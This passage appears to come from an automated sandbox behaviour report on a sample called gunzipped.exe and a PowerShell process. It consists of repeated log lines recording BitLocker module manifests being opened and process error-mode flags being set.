                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
